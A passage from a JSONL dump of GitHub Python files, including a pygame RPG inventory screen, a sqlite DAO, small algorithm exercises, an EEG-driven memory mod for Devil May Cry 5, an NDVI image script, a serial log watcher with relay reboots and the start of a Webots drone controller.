click_on_props()\n if 0 <= chose_num < props_num:\n if type(baggage.objects[chose_num]) == Material or type(baggage.objects[chose_num]) == Drug:\n sale_obj(baggage, baggage.objects[chose_num], content)\n refresh_lists(baggage, prop_list, drug_list, material_list)\n time.sleep(0.2)\n flag = 1\n break\n else:\n screen.fill(CREAM)\n pygame.draw.line(screen, BLACK, (100, 450), (width - 100, 450), 4)\n pygame.draw.line(screen, BLACK, ((width - 200) / 3 + 100, 50),\n ((width - 200) / 3 + 100, 650), 4)\n pygame.draw.line(screen, BLACK, ((width - 200) / 1.5 + 100, 50),\n ((width - 200) / 1.5 + 100, 650), 4)\n show_words(\"售出\", ((width - 200) / 3 - 50, 350), font, BLACK)\n screen.blit(sale_images, sale_image)\n show_words(\"强化\", (width / 2, 350), font, BLACK)\n screen.blit(strengthen_images, strengthen_image)\n show_words(\"附魔\", ((width - 200) / 1.5 + 250, 350), font, BLACK)\n screen.blit(enchant_images, enchant_image)\n show_words(\"装备于\" + str(character_list[0].name), ((width - 200) / 3 - 50, 550), font, BLACK)\n show_words(\"装备于\" + str(character_list[1].name), (width / 2, 550), font, BLACK)\n show_words(\"装备于\" + str(character_list[2].name), ((width - 200) / 1.5 + 250, 550), font, BLACK)\n draw_window()\n while True:\n mouse_pressed = pygame.mouse.get_pressed()\n if mouse_pressed[0] == 1:\n mouse_pos = pygame.mouse.get_pos()\n if 100 < mouse_pos[0] < (width - 200) / 3 + 100 and 50 < mouse_pos[1] < 450:\n sale_obj(baggage, baggage.objects[chose_num], content)\n refresh_lists(baggage, prop_list, drug_list, material_list)\n refresh_baggage(baggage, prop_list, drug_list, material_list)\n tag = 1\n break\n if (width - 200) / 3 + 100 < mouse_pos[0] < (width - 200) / 1.5 + 100 and 50 <\\\n mouse_pos[1] < 450:\n streng_status = strengthen_prop(baggage.objects[chose_num])\n pygame.draw.rect(screen, CREAM, ((0, height - 145), (1100, 145)))\n if streng_status == 1:\n show_words('强化成功!', (width / 2, height - 100), font, RED)\n elif streng_status == 0:\n show_words('强化失败...', (width / 2, height - 100), font, RED)\n elif streng_status == 2:\n show_words('你的装备已经满级了!', (width / 2, height - 100), font, RED)\n elif streng_status == 3:\n show_words('没钱强化个毛啊!需要' + str(baggage.objects[chose_num].need_exp),\n (width / 2, height - 100), font, RED)\n pygame.display.update()\n fclock.tick(fps)\n time.sleep(0.2)\n if 100 < mouse_pos[0] < (width - 200) / 3 + 100 and 450 < mouse_pos[1] < 650:\n add_prop_character(character_list[0], baggage.objects[chose_num], 1)\n tag = 1\n break\n elif (width - 200) / 3 + 100 < mouse_pos[0] < (width - 200) / 1.5 + 100 and 450 \\\n < mouse_pos[1] < 650:\n add_prop_character(character_list[1], baggage.objects[chose_num], 2)\n tag = 1\n break\n elif (width - 200) / 1.5 + 100 < mouse_pos[0] < width - 100 and 450 < mouse_pos[1] < 650:\n add_prop_character(character_list[2], baggage.objects[chose_num], 3)\n tag = 1\n break\n if close_window() == 1:\n break\n if tag == 1:\n flag = 1\n break\n pygame.display.update()\n fclock.tick(fps)\n if width - 180 < mouse_pos[0] < width - 120 and height - 60 < mouse_pos[1] < height and mouse_pressed[0] == 1:\n \"\"\"achievement\"\"\"\n draw_window()\n while True:\n if close_window() == 1:\n break\n if (map_x_velocity > 0 and map_choice[0] < width - 10) or (map_x_velocity < 0 and map_choice[0] > 10):\n map_choice[0] += map_x_velocity\n if (map_y_velocity > 0 and map_choice[1] < height - 10) or (map_y_velocity < 0 and map_choice[1] > 10):\n map_choice[1] += map_y_velocity\n pygame.draw.circle(screen, BLACK, tuple(map_choice), 10)\n screen.blit(character_images, character_image)\n screen.blit(bag_images, bag_image)\n screen.blit(achievement_images, achievement_image)\n draw_map()\n level_choice = level_choose()\n pygame.display.update()\n fclock.tick(fps)\n","repo_name":"DAZHAdazha/No-names-land","sub_path":"无名之地.py","file_name":"无名之地.py","file_ext":"py","file_size_in_byte":40390,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"2076863614","text":"# Private variables\n\nclass Human:\n\n # private class attribute\n __human = 'human'\n\n def __init__(self,name,age):\n self.__name = name\n self.__age = age\n\n def print_msg(self):\n print('name = {},age = {},__human = {}'.format(self.__name,self.__age,self.__human))\n\nhuman = Human('taro',20)\n# forcibly access a private variable from outside the class\nprint(human._Human__name)\n\nhuman.print_msg()\n","repo_name":"takicoYuki/pythonDesignPattern","sub_path":"myproject/class/base10.py","file_name":"base10.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
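# Name mangling is why the "forced" access above works: the interpreter stores a
# double-underscore attribute as _ClassName__attr. A one-line check, assuming the
# Human class defined above (the dir() filter is purely illustrative):
print([attr for attr in dir(human) if 'name' in attr])  # ['_Human__name']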
+{"seq_id":"74574242011","text":"import inspect\n\n\ndef orm(cursor, dto_type):\n # the following line retrieves the argument names of the constructor\n # (getargspec was removed from the standard library; getfullargspec is its replacement)\n args = inspect.getfullargspec(dto_type.__init__).args\n\n # the first argument of the constructor will be 'self', it does not correspond\n # to any database field, so we can ignore it.\n args = args[1:]\n\n # gets the names of the columns returned in the cursor\n col_names = [column[0] for column in cursor.description]\n\n # map them into the position of the corresponding constructor argument\n col_mapping = [col_names.index(arg) for arg in args]\n return [row_map(row, col_mapping, dto_type) for row in cursor.fetchall()]\n\n\ndef row_map(row, col_mapping, dto_type):\n ctor_args = [row[idx] for idx in col_mapping]\n return dto_type(*ctor_args)\n\n\n# we can use our method above in order to start writing a generic Dao\n# note that this class is not complete and we will add methods to it next\nclass Dao(object):\n def __init__(self, dto_type, conn):\n self._conn = conn\n self._dto_type = dto_type\n\n # dto_type is a class, its __name__ field contains a string representing the name of the class.\n self._table_name = dto_type.__name__.lower() + 's'\n\n def insert(self, dto_instance):\n ins_dict = vars(dto_instance)\n column_names = ','.join(ins_dict.keys())\n params = ins_dict.values()\n qmarks = ','.join(['?'] * len(ins_dict))\n stmt = 'INSERT INTO {} ({}) VALUES ({})' \\\n .format(self._table_name, column_names, qmarks)\n self._conn.execute(stmt, tuple(params))\n\n def update(self, dto_instance):\n ins_dict = vars(dto_instance)\n # crude primary-key detection: use 'id' when present, otherwise fall back to 'grade'\n if ins_dict.get('id') is not None:\n pk = 'id'\n pkVal = '{}'.format(ins_dict.get(pk))\n else:\n pk = 'grade'\n pkVal = '\\'{}\\''.format(ins_dict.get(pk))\n\n column_names = '=?,'.join(ins_dict.keys())\n column_names += '=?'\n params = ins_dict.values()\n stmt = 'UPDATE {} SET {} WHERE {} = {}' \\\n .format(self._table_name, column_names, pk, pkVal)\n self._conn.execute(stmt, tuple(params))\n\n # delete\n def delete(self, keyvals):\n column_names = keyvals.keys()\n params = keyvals.values()\n stmt = 'DELETE FROM {} WHERE {}' \\\n .format(self._table_name, ' AND '.join([col + '=?' for col in column_names]))\n self._conn.execute(stmt, tuple(params))\n\n # find all\n def find_all(self):\n c = self._conn.cursor()\n c.execute('SELECT * FROM {}'.format(self._table_name))\n return orm(c, self._dto_type)\n\n # find by specific attributes\n def find(self, **keyvals):\n column_names = keyvals.keys()\n params = keyvals.values()\n\n stmt = 'SELECT * FROM {} WHERE {}' \\\n .format(self._table_name, ' AND '.join([col + '=?' for col in column_names]))\n\n c = self._conn.cursor()\n c.execute(stmt, tuple(params))\n return orm(c, self._dto_type)\n","repo_name":"y0natancohen/spl4","sub_path":"dbtools.py","file_name":"dbtools.py","file_ext":"py","file_size_in_byte":3149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
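# A minimal usage sketch for the orm()/Dao pattern above. The Student class, the
# in-memory sqlite3 database and the column names are illustrative assumptions,
# not part of the original repository; the only requirement is that the
# constructor argument names match the table's columns, since orm() maps cursor
# columns onto __init__ parameters by name.
import sqlite3

class Student(object):
    def __init__(self, id, name, grade):
        self.id = id
        self.name = name
        self.grade = grade

conn = sqlite3.connect(':memory:')
conn.execute('CREATE TABLE students (id INTEGER, name TEXT, grade TEXT)')
dao = Dao(Student, conn)  # table name is derived as 'student' + 's'
dao.insert(Student(1, 'Ada', 'A'))
print([s.name for s in dao.find_all()])  # ['Ada']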
+{"seq_id":"37542934491","text":"from flask import Flask, request, jsonify, render_template\nfrom integrator import data_converter\n\napp = Flask(__name__)\n\n@app.route('/main', methods=['POST'])\ndef main():\n data = request.json\n input_data = data.get('inputData', {})\n output_data = data_converter(input_data)\n\n return jsonify(output_data)\n\n\n@app.route('/')\ndef index():\n return render_template('main.html')\n\n\n\n\nif __name__ == '__main__':\n app.run(debug=True, port=5000)","repo_name":"szalecki-a/Krasowskis_calculator","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
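# A client-side sketch of the /main endpoint above: the handler reads the
# 'inputData' key from the posted JSON and returns data_converter's result. The
# inner payload fields are an assumption here, since data_converter's contract
# is not shown in this file.
import requests

resp = requests.post('http://127.0.0.1:5000/main', json={'inputData': {}})
print(resp.json())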
+{"seq_id":"28711683313","text":"# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\nclass Solution:\n def mergeTwoLists(self, l1: ListNode, l2: ListNode) -> ListNode:\n head = ListNode()\n current = head\n while l1 or l2 :\n if l1 and l2 :\n if l1.val > l2.val :\n current.next = ListNode(l2.val)\n current = current.next\n l2 = l2.next\n else :\n current.next = ListNode(l1.val)\n current = current.next\n l1 = l1.next\n else :\n c = l1 if l1 else l2\n current.next = c\n break\n return head.next","repo_name":"sbyeol3/Algorithm-Study","sub_path":"LeetCode/Q1-Q500/Q21.py","file_name":"Q21.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
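# A small self-contained driver for the merge above; the helper names
# (build_list, to_pylist) are illustrative, not part of the original submission.
def build_list(values):
    head = None
    for v in reversed(values):
        head = ListNode(v, head)  # prepend, so the result keeps input order
    return head

def to_pylist(node):
    out = []
    while node:
        out.append(node.val)
        node = node.next
    return out

merged = Solution().mergeTwoLists(build_list([1, 2, 4]), build_list([1, 3, 4]))
print(to_pylist(merged))  # [1, 1, 2, 3, 4, 4]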
+{"seq_id":"34819903975","text":"# DFS using recursion\ndef recursive_dfs(v, discovered=None):\n # use None instead of a mutable default argument, so repeated calls\n # do not share (and keep appending to) the same list\n if discovered is None:\n discovered = []\n discovered.append(v)\n\n for x in graph[v]:\n if x not in discovered:\n recursive_dfs(x, discovered)\n\n return discovered\n\n# DFS using an explicit stack\ndef iterative_dfs(v, discovered=None):\n if discovered is None:\n discovered = []\n stack = [v]\n\n while stack:\n x = stack.pop()\n if x not in discovered:\n discovered.append(x)\n for value in graph[x]:\n stack.append(value)\n\n return discovered\n\ngraph = {\n 1: [2, 3, 4],\n 2: [5],\n 3: [5],\n 4: [],\n 5: [6, 7],\n 6: [],\n 7: [3]\n}\n\nprint(recursive_dfs(1))\nprint(iterative_dfs(1))","repo_name":"Park-min-hyoung/PAI","sub_path":"그래프/DFS.py","file_name":"DFS.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
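# Expected output of the two traversals above, worked out by hand for the given
# adjacency dict:
# recursive_dfs(1) -> [1, 2, 5, 6, 7, 3, 4]  (each branch followed to its end)
# iterative_dfs(1) -> [1, 4, 3, 5, 7, 6, 2]  (the stack pops the last-pushed
# neighbour first, so siblings come back in reverse order)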
+{"seq_id":"35614368756","text":"from PyQt5 import QtWidgets as qtw\nfrom PyQt5 import QtGui as qtg\nfrom PyQt5 import QtCore as qtc\nfrom PyQt5 import QtChart as qtch\n\nfrom ReadWriteMem import ReadWriteMemory\n\nfrom designer.dmc_mod_from import Ui_DmcEegModForm\n\n\nclass DMCMod(qtw.QMainWindow):\n\n def __init__(self):\n super().__init__()\n\n # Window Initialization\n self.setWindowTitle('DMC5 EEG Concentration Mod')\n central_wdg = qtw.QWidget()\n self.setCentralWidget(central_wdg)\n self.mod_form = Ui_DmcEegModForm()\n self.mod_form.setupUi(central_wdg)\n self.status = qtw.QStatusBar()\n self.setStatusBar(self.status)\n\n self.is_connected = False\n self.is_injecting = False\n self.current_eeg_concentration = 0.6\n\n # Read Write Memory params\n self.rwm = ReadWriteMemory()\n self.process = None\n self.concentration_ptr = None\n\n # Buttons Trigger\n self.mod_form.connectBtn.clicked.connect(self.connect)\n self.mod_form.setValBtn.clicked.connect(self.form_set_value)\n self.mod_form.startBtn.clicked.connect(self.execute_injection)\n\n self.concentration_update_value = 0\n\n # Timers\n self.value_update_timer = qtc.QTimer()\n self.value_update_timer.timeout.connect(self.update_value)\n self.injection_timer = qtc.QTimer()\n self.injection_timer.timeout.connect(self.inject_value)\n\n def inject_value(self):\n # TODO: check if in combat\n self.write_dmc_concentration(self.concentration_update_value)\n\n def update_value(self):\n print('update dmc5')\n # calculate update value\n dmc_concentration = self.read_dmc_concentration()\n update_value = self.current_eeg_concentration - self.mod_form.thrSpinBox.value()\n if update_value > 0:\n update_value *= self.mod_form.addSpinBox.value()\n else:\n update_value *= self.mod_form.subSpinBox.value()\n\n next_concentration_value = dmc_concentration + update_value\n if next_concentration_value > 300:\n next_concentration_value = 300\n elif next_concentration_value < 0:\n next_concentration_value = 0\n\n # update status values\n self.mod_form.concentrationLabel.setText(str(self.current_eeg_concentration))\n self.mod_form.updateLabel.setText(str(update_value))\n self.mod_form.gameLabel.setText(str(dmc_concentration))\n self.mod_form.nextGameLabel.setText(str(next_concentration_value))\n\n # update game value\n self.concentration_update_value = next_concentration_value\n\n\n def execute_injection(self):\n if not self.is_connected:\n print('not connected to game')\n return\n if not self.is_injecting:\n print('start inject')\n update_interval = self.mod_form.valUpdateIntervalSpinBox.value()\n inject_interval = self.mod_form.injectIntervalSpinBox.value()\n self.value_update_timer.start(update_interval)\n self.injection_timer.start(inject_interval)\n self.mod_form.startBtn.setText('Stop Injection')\n self.mod_form.connectBtn.setDisabled(True)\n self.is_injecting = True\n else:\n self.value_update_timer.stop()\n self.injection_timer.stop()\n self.mod_form.connectBtn.setDisabled(False)\n self.mod_form.startBtn.setText('Start Injection')\n self.is_injecting = False\n\n def form_set_value(self):\n val = self.mod_form.valSpinBox.value()\n self.concentration_update_value = val\n if self.is_connected:\n self.write_dmc_concentration(val)\n # update status values\n self.mod_form.concentrationLabel.setText(str(self.current_eeg_concentration))\n self.mod_form.updateLabel.setText(str(0))\n self.mod_form.gameLabel.setText(str(val))\n self.mod_form.nextGameLabel.setText(str(val))\n\n # Base Methods\n def connect(self):\n if not self.is_connected:\n self.process = 
self.rwm.get_process_by_name('DevilMayCry5.exe')\n self.process.open()\n\n # Get concentration pointer\n base_offset = 0X7E61B90\n module_addr = int(str(self.process.base_addr), 0) + int(str(base_offset), 0)\n self.concentration_ptr = self.process.get_pointer(lp_base_address=module_addr, offsets=[0x78, 0x1B50])\n\n # TODO: Get in combat ptr\n self.is_connected = True\n self.mod_form.connectBtn.setText('Disconnect')\n print('connection to dmc5')\n else:\n self.process.close()\n self.is_connected = False\n self.mod_form.connectBtn.setText('Connect')\n print('disconnect from dmc5')\n\n def read_dmc_concentration(self):\n con_val = self.process.read_float(self.concentration_ptr)\n print('Read concentration:', con_val)\n return con_val\n\n def write_dmc_concentration(self, val):\n state = self.process.write(self.concentration_ptr, val)\n print('write concentration state:', state)\n\n def closeEvent(self, event):\n if self.is_connected:\n self.process.close()\n self.is_connected = False\n","repo_name":"aryanakr/open-sourece-python-EEG-handling-software","sub_path":"dmc_mod.py","file_name":"dmc_mod.py","file_ext":"py","file_size_in_byte":5258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"8168599952","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Sep 20 10:37:45 2021\r\n\r\n@author: cosmi\r\n\"\"\"\r\n\r\n\"\"\"\r\nDenoised Vegetation Index Mapping program using DJI Mavic 2 Pro\r\nJPEG 16-bit combo images taken using InfraBlue Filter\r\n%(c)-J. Campbell MuonRay Enterprises 2021\r\n% creative commons For non-profit use only\r\nThis Python script was created using the Spyder Editor\r\n\"\"\"\r\n\r\nimport warnings\r\nwarnings.filterwarnings('ignore')\r\n\r\nfrom PIL import Image\r\nimport pylab\r\nimport rof\r\n\r\nimport imageio\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt # For image viewing\r\n\r\n#!/usr/bin/python\r\nimport os\r\nimport getopt\r\nimport sys\r\n\r\nfrom matplotlib import colors\r\nfrom matplotlib import ticker\r\nfrom matplotlib.colors import LinearSegmentedColormap\r\n\r\n\r\n\r\n# a nice selection of colour palettes\r\ncols1 = ['blue', 'green', 'yellow', 'red']\r\ncols2 = ['gray', 'gray', 'red', 'yellow', 'green']\r\ncols3 = ['gray', 'blue', 'green', 'yellow', 'red']\r\n\r\ncols4 = ['black', 'gray', 'blue', 'green', 'yellow', 'red']\r\n\r\ndef create_colormap(args):\r\n return LinearSegmentedColormap.from_list(name='custom1', colors=cols3)\r\n\r\n# colour bar to match the NDVI units\r\ndef create_colorbar(fig, image):\r\n position = fig.add_axes([0.125, 0.19, 0.2, 0.05])\r\n norm = colors.Normalize(vmin=-1., vmax=1.)\r\n cbar = plt.colorbar(image,\r\n cax=position,\r\n orientation='horizontal',\r\n norm=norm)\r\n cbar.ax.tick_params(labelsize=6)\r\n tick_locator = ticker.MaxNLocator(nbins=3)\r\n cbar.locator = tick_locator\r\n cbar.update_ticks()\r\n cbar.set_label(\"NDVI\", fontsize=10, x=0.5, y=0.5, labelpad=-25)\r\n\r\n\r\n\r\nfor infile in os.listdir(\"./\"):\r\n print( \"file : \" + infile)\r\n if infile[-3:] == \"jpg\" or infile[-3:] == \"JPG\" :\r\n # print \"is tif or DNG (RAW)\"\r\n outfile = infile[:-3] + \"jpg\"\r\n # scipy.misc.imread was removed from SciPy; imageio provides the same call\r\n rgb = imageio.imread(infile)\r\n \r\n \r\n print( \"new filename : \" + outfile)\r\n # Extract Red, Green and Blue channels and save as separate files\r\n \r\n\r\n R = rgb[:,:,0]\r\n G = rgb[:,:,1]\r\n B = rgb[:,:,2]\r\n \r\n # Get the red band from the rgb image, and open it as a numpy matrix\r\n#NIR = image[:, :, 0]\r\n#ir = np.asarray(NIR, float)\r\n \r\n ir = (R).astype('float')\r\n \r\n# Get one of the IR image bands (all bands should be same)\r\n#blue = image[:, :, 2]\r\n\r\n#r = np.asarray(blue, float)\r\n \r\n r = (B).astype('float')\r\n \r\n #denoise\r\n \r\n denoised_ir_channel = ir\r\n \r\n \r\n U,T = rof.denoise(denoised_ir_channel,denoised_ir_channel)\r\n \r\n #pylab.figure()\r\n #pylab.gray()\r\n #pylab.imshow(U)\r\n #pylab.axis('equal')\r\n #pylab.axis('off')\r\n #pylab.show()\r\n\r\n\r\n# Create a numpy matrix of zeros to hold the calculated NDVI values for each pixel\r\n # The NDVI image will be the same size as the input image\r\n\r\n \r\n ndvi = np.zeros(r.size) \r\n \r\n# Calculate NDVI\r\n \r\n \r\n ndvi = np.true_divide(np.subtract(U, r), np.add(U, r))\r\n fig, ax = plt.subplots()\r\n\r\n image = ax.imshow(ndvi, cmap=create_colormap(colors))\r\n plt.axis('off')\r\n #Lock or Unlock Key Bar Here for Mapping/Sampling/Showcasing:\r\n #create_colorbar(fig, image)\r\n extent = ax.get_window_extent().transformed(fig.dpi_scale_trans.inverted())\r\n #imageio.imsave(outfile, ndvi)\r\n fig.savefig(outfile, dpi=600, transparent=True, bbox_inches=extent, pad_inches=0)\r\n\r\n # plt.show()\r\n \r\n \r\n# rgb = raw.postprocess()\r\n\r\n # plt.show()","repo_name":"MuonRay/Image_Denoising_with_ROF_algorithm","sub_path":"ndvi_denoise_batch.py","file_name":"ndvi_denoise_batch.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"}
+{"seq_id":"24379849888","text":"# Momentum indicator: compares the current price with the price from a\n# selected number of periods ago.\n\n#%%\nimport pandas as pd\nfrom pandas_datareader import data\nimport matplotlib.pyplot as plt\n\n\nstart_date = '2014-01-01'\nend_date = '2018-01-01'\n\nSRC_DATA_FILENAME = 'goog_data.pkl'\n\ntry:\n goog_data2 = pd.read_pickle(SRC_DATA_FILENAME)\nexcept FileNotFoundError:\n # DataReader takes the data source ('yahoo' here) before the date range\n goog_data2 = data.DataReader('GOOG', 'yahoo', start_date, end_date)\n goog_data2.to_pickle(SRC_DATA_FILENAME)\n\ngoog_data = goog_data2.tail(620) \nclose = goog_data['Close']\n\ntime_period = 20\nhistory = []\nmom_values = []\n\nfor close_price in close:\n history.append(close_price)\n if len(history) > time_period:\n del (history[0])\n \n mom = close_price - history[0]\n mom_values.append(mom)\n \ngoog_data = goog_data.assign(ClosePrice=pd.Series(close, index=goog_data.index))\ngoog_data = goog_data.assign(MomentumFromPrice20DaysAgo=pd.Series(mom_values, index=goog_data.index))\n\nclose_price = goog_data['ClosePrice']\nmom = goog_data['MomentumFromPrice20DaysAgo']\n\nfig = plt.figure()\nax1 = fig.add_subplot(211, ylabel='Google price in $')\nclose_price.plot(ax=ax1, color='g', lw=2, legend=True)\nax2 = fig.add_subplot(212, ylabel='Momentum in $')\nmom.plot(ax=ax2, color='b', lw=2, legend=True)\nplt.show()\n\n# %%\n","repo_name":"agbleze/python_algotrade","sub_path":"mom.py","file_name":"mom.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
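# The rolling-window bookkeeping above (append, then delete the oldest entry
# once the history exceeds time_period) can be expressed with a bounded deque;
# a sketch on made-up prices that mirrors the loop's arithmetic exactly:
from collections import deque

def momentum(prices, time_period=3):
    history = deque(maxlen=time_period)  # drops the oldest price automatically
    out = []
    for p in prices:
        history.append(p)
        out.append(p - history[0])  # history[0] is the oldest retained price
    return out

print(momentum([10, 11, 13, 12, 15]))  # [0, 1, 3, 1, 2]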
+{"seq_id":"42243747327","text":"#!/usr/bin/python2\n\nimport sys\nimport argparse\nimport pexpect\nimport select\nimport re\nimport smtplib\nimport os\nimport time\nimport smtp_credentials\n\nfrom email.mime.text import MIMEText\n\n#FIXME: Known bug: last line not seen\n\nparser = argparse.ArgumentParser(description='Log parser')\n\nparser.add_argument('FILE', help='path to the log to parse')\nparser.add_argument('RELAY', type=int, help=\"relay port associated to the board whose log is being parsed\")\nparser.add_argument('RELAY_IP', help=\"IP address of the relays\")\nparser.add_argument('RELAY_PORT', type=int, help=\"port of the relays\")\n\nargs = parser.parse_args()\n\npower_cmd = \"command_relay.py %s %d %d\" % (args.RELAY_IP, args.RELAY_PORT, args.RELAY)\n\n\nrecipients = smtp_credentials.recipients\nme = smtp_credentials.mail\n\ndef send_mail(status, filename, line=\"\", reboot=False):\n\tcontent = \"%s occured on device %s:\\n%s\" % (status, filename, line)\n\tif reboot:\n\t\tcontent += \"\\nThe device is being rebooted.\"\n\tmsg = MIMEText(content)\n\tmsg['Subject'] = \"%s on device %s\" % (status, filename)\n\tmsg['To'] = \", \".join(recipients)\n\tmsg['From'] = me\n\tserver = smtplib.SMTP(smtp_credentials.server, smtp_credentials.port)\n\tserver.ehlo()\n\tserver.starttls()\n\tserver.login(smtp_credentials.login, smtp_credentials.password)\n\tserver.sendmail(me, recipients, msg.as_string())\n\tserver.quit()\n\ndef reboot_board():\n\tos.spawnvp(os.P_WAIT, 'command_relay.py', (power_cmd + \" off\").split())\n\ttime.sleep(5)\n\tos.spawnvp(os.P_WAIT, 'command_relay.py', (power_cmd + \" on\").split())\n\ndef timeout_detected(filename):\n\tif time.mktime(time.gmtime()) >= freeze_timeout + last_line:\n\t\tsend_mail(\"timeout of %ds\" % freeze_timeout, filename, reboot=True)\n\t\treboot_board()\n\n#Timeout in milli seconds before serial is considered frozen\ntimeout = 60 * 1000 * 10\n\n#Timeout in seconds before board is declared crashed\nfreeze_timeout = 60 * 30\nlast_line = time.mktime(time.gmtime())\nfirst_err = True\n\nboard_rebooted_re = re.compile('Hit any key to stop autoboot')\nreboot_templates = ['send stop command failed', 'Oops']\nmatching_templates = ['UBI.*err']\nmatching_res = []\nreboot_res = []\nfor matching_template in matching_templates:\n\tmatching_res.append(re.compile(matching_template))\n\nfor reboot_template in reboot_templates:\n\treboot_res.append(re.compile(reboot_template))\n\nserial = pexpect.spawn(\"tail -F %s\" % args.FILE, timeout=freeze_timeout)\npoll = select.poll()\npoll.register(serial, select.POLLIN)\n\nwhile True:\n\tpoll_ok = poll.poll(timeout)\n\tif not poll_ok:\n\t\ttimeout_detected(args.FILE)\n\t\tcontinue\n\n\ttry:\n\t\tline = serial.readline()\n\texcept pexpect.TIMEOUT:\n\t\ttimeout_detected(args.FILE)\n\t\tcontinue\n\n\tlast_line = time.mktime(time.gmtime())\n\tif board_rebooted_re.search(line):\n\t\tfirst_err = True\n\tfor matching_re in matching_res:\n\t\tmatch = matching_re.search(line)\n\t\tif match:\n\t\t\tif first_err:\n\t\t\t\tsend_mail(\"error\", args.FILE, line)\n\t\t\tfirst_err = False\n\t\t\tbreak\n\tif match:\n\t\tcontinue\n\tfor reboot_re in reboot_res:\n\t\tmatch = reboot_re.search(line)\n\t\tif match:\n\t\t\tif first_err:\n\t\t\t\tsend_mail(\"error\", args.FILE, line, True)\n\t\t\t\treboot_board()\n\t\t\tfirst_err = 
False\n\t\t\tbreak\n\n\nsys.exit(0)\n","repo_name":"bbrezillon/ntc-test-automation","sub_path":"log_parser.py","file_name":"log_parser.py","file_ext":"py","file_size_in_byte":3111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"12371603899","text":"import logging\n\nfrom vars import var\n\nfrom pyrogram import Client, idle\n\n\nlogging.getLogger(\"pyrogram\").setLevel(logging.INFO)\n\nTgraph = Client(\n \"Telegra.ph Uploader\",\n api_id=var.API_ID,\n api_hash=var.API_HASH,\n bot_token=var.BOT_TOKEN,\n plugins=dict(root=\"plugins\"),\n)\n\n\nTgraph.start()\nuname = (Tgraph.get_me()).username\nprint(f\"@{uname} Deployed Successfully !\")\n\nidle()\n","repo_name":"Captainamarica/NightVission-Telegrapbot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"29992892657","text":"\ndef soroban(frame):\n for i in range(len(frame)):\n frame[i] = frame[i][::-1]\n ans = 0\n power = 1\n for elem in frame[0]:\n if elem == '|':\n # '5-bead' is active:\n ans += 5 * power\n power *= 10\n power = 1\n for col in range(len(frame[0])):\n cnt = 0\n idx = 3\n while idx < len(frame) and frame[idx][col] == 'O':\n cnt += 1\n idx += 1\n ans += cnt * power\n power *= 10\n return ans\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"ivSPJNgW4ChfbrKbR_20.py","file_name":"ivSPJNgW4ChfbrKbR_20.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"29992892657","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 27 08:49:45 2020\n\n@author: Angel Ayala \n\"\"\"\nimport numpy as np\n\nfrom webots_drone.utils import bytes2image\n\n\nclass Drone:\n \"\"\"The Drone class manages the sensors and actuators of the drone.\n\n It is developed for the Mavic 2 Pro drone, which consists of GPS, IMU, Gyro,\n Compass, Camera, LED and Motor nodes.\n This drone control unit is designed to stabilize the drone through 4 PID\n controllers tuned for an 8 ms simulation timestep, and the drone's gimbal\n with a Damping node in the WorldInfo node with values of 0.5 for both\n angular and linear fields.\n\n :param Robot robot: The instantiated Robot node; its basic timestep must be\n 8 ms, as unexpected behaviour can occur with a different value.\n \"\"\"\n\n def __init__(self, robot):\n # Time helpers\n self.time_counter = 0\n\n # Variables\n self.lift_thrust = 68.5 # with this thrust, the drone lifts.\n self.init_dist_sensors(robot, int(robot.getBasicTimeStep()))\n self.init_devices(robot, int(robot.getBasicTimeStep()))\n self._position = np.array([0.0, 0.0, 0.0])\n\n def init_dist_sensors(self, drone_node, timestep):\n \"\"\"Initialize each distance sensor of the Mavic 2 Pro.\n\n :param drone_node Robot: The instantiated Robot Node class.\n :param integer timestep: The simulation timestep; 8 ms must be set, as\n unexpected behaviour can occur with a different value.\n \"\"\"\n self.sensors_id = ['front left dist sonar',\n 'front right dist sonar',\n 'rear top dist sonar',\n 'rear bottom dist sonar',\n 'left side dist sonar',\n 'right side dist sonar',\n 'down front dist sonar',\n 'down back dist sonar',\n 'top dist infrared']\n # instantiate distance sensors\n self.sensors = list()\n for sid in self.sensors_id:\n sensor = drone_node.getDevice(sid)\n sensor.enable(timestep)\n self.sensors.append(sensor)\n\n return True\n\n def init_devices(self, drone_node, timestep):\n \"\"\"Initialize each device of the Mavic 2 Pro, in a desired timestep.\n\n The camera node is enabled at a 40 ms timestep to reach 25 fps.\n\n :param drone_node Robot: The instantiated Robot Node class.\n :param integer timestep: The simulation timestep; 8 ms must be set, as\n unexpected behaviour can occur with a different value.\n \"\"\"\n # Position coordinates [X, Y, Z]\n self.gps = drone_node.getDevice(\"gps\")\n self.gps.enable(timestep)\n # Angles respect global coordinates [roll, pitch, yaw]\n self.imu = drone_node.getDevice(\"inertial unit\")\n self.imu.enable(timestep)\n # Acceleration angles [roll, pitch, yaw]\n self.gyro = drone_node.getDevice(\"gyro\")\n self.gyro.enable(timestep)\n # 